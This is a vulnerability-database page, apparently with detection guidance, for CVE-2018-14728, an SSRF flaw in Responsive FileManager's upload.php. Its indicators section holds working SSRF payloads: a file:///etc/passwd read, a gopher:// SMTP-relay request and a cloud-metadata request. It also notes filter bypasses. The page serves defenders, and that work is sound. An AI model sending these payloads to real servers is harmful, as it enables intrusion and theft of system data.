cbcvebase.
CVE-2018-14728
published 2018-08-03

CVE-2018-14728: upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.

PriorityP277critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
76.51%
99.5th percentile
upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.

Affected

3 ranges
VendorProductVersion rangeFixed in
tecrailresponsive_filemanager
tecrailresponsive_filemanager
tecrailresponsive_filemanager

Detection & IOCsextracted from sources · hover to see the quote

path/filemanager/upload.php
commandfldr=&url=file:///etc/passwd
commandfldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
commandfldr=&url=http://169.254.169.254/openstack
yara
regex: root:.*:0:0:
  • Monitor POST requests to /filemanager/upload.php containing a 'url' parameter with schemes such as file://, gopher://, or internal IP ranges (e.g., 169.254.169.254) in the request body, indicating SSRF exploitation attempts.
  • Detect SSRF bypass attempts where a .ico filename is appended to PATH_INFO of upload.php to circumvent file-extension blocking controls.
  • Watch for DNS pinning bypass attempts where an attacker-controlled hostname resolves to 0.0.0.0 to reach internal services via the url parameter of upload.php.
  • Alert on POST bodies to upload.php containing gopher:// scheme URLs targeting internal ports (e.g., port 25), which can be used to relay SMTP commands via SSRF.
  • Successful exploitation of CVE-2018-14728 may return /etc/passwd content in the HTTP response body; detect responses matching the pattern root:.*:0:0: from upload.php endpoints.
  • ·CVE-2018-14728 was incompletely fixed; CVE-2020-10212 covers bypass techniques (PATH_INFO .ico suffix and DNS pinning to 0.0.0.0) that still affect versions 9.13.4 and 9.14.0, so detections must account for both the original and bypass variants.
  • ·File-extension blocking in upload.php is bypassable via PATH_INFO manipulation (e.g., appending .ico), meaning extension-based WAF/IDS rules alone are insufficient to block SSRF payloads.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.